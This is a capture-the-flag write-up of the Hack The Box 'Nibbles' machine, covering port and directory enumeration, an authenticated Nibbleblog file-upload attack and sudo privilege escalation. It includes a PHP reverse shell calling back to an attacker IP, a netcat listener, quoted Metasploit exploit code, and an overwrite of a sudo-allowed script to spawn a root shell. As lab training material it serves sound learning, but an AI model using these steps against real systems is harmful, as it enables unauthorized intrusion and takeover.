Nibbles

Enumeration

As usual, we start with an nmap scan, in order to find open ports in the target machine.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.75 -oN allPorts

-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Thu Mar 10 12:19:23 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.75
Warning: 10.10.10.75 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.75
Host is up (0.058s latency).
Not shown: 64924 closed tcp ports (reset), 609 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

# Nmap done at Thu Mar 10 12:19:41 2022 -- 1 IP address (1 host up) scanned in 18.48 seconds

As we see, only port 22 (SSH) and port 80 (HTTP) are open. Let's try to obtain more information about the service and version running on these ports.

nmap -sC -sV -p22,80 10.10.10.68 -oN targeted

-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file

# Nmap 7.92 scan initiated Thu Mar 10 12:20:32 2022 as: nmap -sCV -p22,80 -oN targeted 10.10.10.75
Nmap scan report for 10.10.10.75
Host is up (0.038s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 10 12:20:43 2022 -- 1 IP address (1 host up) scanned in 11.11 seconds

Let's take a look at the website.

There's not much going on. But, if we take a look at the source code, we'll see that we can access the /nibbleblog/ directory.

<b>Hello world!</b>














<!-- /nibbleblog/ directory. Nothing interesting here! -->

If we take a look at the /nibbleblog/ directory, we'll see in the bottom right corner that it is using Nibbleblog.

Let's try to enumerate directories and .php files with gobuster.

gobuster dir -u http://10.10.10.75/nibbleblog -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x php

dir enumerates directories or files.
-u the target URL.
-w path to the wordlist.
-t number of current threads, in this case 200 threads.
-x file extensions to search for.

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.75/nibbleblog
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2022/03/10 15:17:14 Starting gobuster in directory enumeration mode
===============================================================
/content              (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/]
/sitemap.php          (Status: 200) [Size: 402]                                             
/themes               (Status: 301) [Size: 322] [--> http://10.10.10.75/nibbleblog/themes/] 
/feed.php             (Status: 200) [Size: 302]                                             
/admin                (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/]  
/admin.php            (Status: 200) [Size: 1401]                                            
/plugins              (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/plugins/]
/install.php          (Status: 200) [Size: 78]                                              
/README               (Status: 200) [Size: 4628]                                            
/update.php           (Status: 200) [Size: 1622]                                            
/languages            (Status: 301) [Size: 325] [--> http://10.10.10.75/nibbleblog/languages/]
/index.php            (Status: 200) [Size: 2986]                                              
                                                                                              
===============================================================
2022/03/10 15:20:32 Finished
===============================================================

Exploitation

Let's search for common Nibbleblog exploits.

searchsploit nibbleblog

---------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                    |  Path
---------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Nibbleblog 3 - Multiple SQL Injections                                                                                            | php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)                                                                             | php/remote/38489.rb
---------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

If we inspect the Arbitrary File Upload one, we can see that it is logging in to the admin.php page.

res = send_request_cgi(
      'method'      => 'POST',
      'uri'         => normalize_uri(target_uri.path, 'admin.php'),
      'cookie'      => session_cookie,
      'vars_post'   => {
        'username'  => user,
        'password'  => pass
      }
    )

But we don't have any credentials. I found the admin user on the http://10.10.10.75/nibbleblog/content/private/users.xml inside the /content directory we found in the gobuster scan.

At this point I tried random credentials on the admin.php page, and I got in with the admin user and the nibbles password.

And we get in.

Once we have logged in, the script uploads a file to a plugin called My image.

res = send_request_cgi(
      'method'        => 'POST',
      'uri'           => normalize_uri(target_uri, 'admin.php'),
      'vars_get'      => {
        'controller'  => 'plugins',
        'action'      => 'config',
        'plugin'      => 'my_image'
      },
      'ctype'         => "multipart/form-data; boundary=#{data.bound}",
      'data'          => post_data,
      'cookie'        => cookie
    )

If we go the the Plugins section, we'll see an installed plugin called My image.

If we hit Configure, we'll see that we can upload a file. I will upload the /usr/share/webshells/php/php-reverse-shell.php PHP reverse shell. But before uploading it, we have to modified it by changing the $ip variable and the $port variable.

$ip = '10.10.14.6';  // CHANGE THIS
$port = 4444;       // CHANGE THIS

Now, we can upload the PHP file to the My image plugin.

Finally, we can see in the Arbitrary File Upload exploit that the PHP file is stored in the /content/private/plugins/my_image folder under the image.php name.

php_fname = 'image.php'
payload_url = normalize_uri(target_uri.path, 'content', 'private', 'plugins', 'my_image', php_fname)

But before executing it, let's set a netcat listener on port 4444.

nc -lvnp 4444

-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.

If now we access the http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php file, we'll get a reverse shell as the nibbler user, and we'll be able to get the user flag.

listening on [any] 4444 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.75] 57220
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 09:42:57 up  2:59,  0 users,  load average: 0.00, 0.03, 0.25
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
nibbler
$ cat /home/nibbler/user.txt
c587819fe41103ce29a36823dc7cd9d6

Privilege Escalation

First of all, let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg

Next, I export a few variables:

export TERM=xterm
export SHELL=bash

Finally, I run the following command in our local machine:

stty size

51 236

And set the proper dimensions in the victim machine:

stty rows 51 columns 236

Let's list the sudo privileges of the nibbler user.

sudo -l

-l list user privileges.

Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

We can execute the /home/nibbler/personal/stuff/monitor.sh script as the root user. But if we try to list the script, we'll see that it doesn't exist.

ls -l /home/nibbler/personal/stuff/monitor.sh

ls: cannot access '/home/nibbler/personal/stuff/monitor.sh': No such file or directory

But, if we see in the home directory of the nibbler user, we'll see that there is an .zip file.

ls -la /home/nibbler/

total 20
drwxr-xr-x 3 nibbler nibbler 4096 Mar 10 09:50 .
drwxr-xr-x 3 root    root    4096 Dec 10  2017 ..
-rw------- 1 nibbler nibbler    0 Dec 29  2017 .bash_history
drwxrwxr-x 2 nibbler nibbler 4096 Dec 10  2017 .nano
-r-------- 1 nibbler nibbler 1855 Dec 10  2017 personal.zip
-r-------- 1 nibbler nibbler   33 Mar 10 06:43 user.txt

Let's unzip it.

unzip personal.zip

Archive:  personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh

Inside was the monitor.sh script that we have sudo permissions on.

ls -l /home/nibbler/personal/stuff/monitor.sh

-rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 /home/nibbler/personal/stuff/monitor.sh

As we have the right permission to write on it, we could remove everything inside, and add a bash script which will spawn a shell as root, when we'll execute it with sudo privileges.

nano /home/nibbler/personal/stuff/monitor.sh

#!/bin/bash
bash

Now all we have to do is execute the script with sudo, and we'll be able to reap the harvest and take the root flag.

sudo /home/nibbler/personal/stuff/monitor.sh

root@Nibbles:/home/nibbler# whoami
root
root@Nibbles:/home/nibbler# cat /root/root.txt 
79e4a7369f8e0752572e05c7bfc96df5

Last updated 2 years ago

Was this helpful?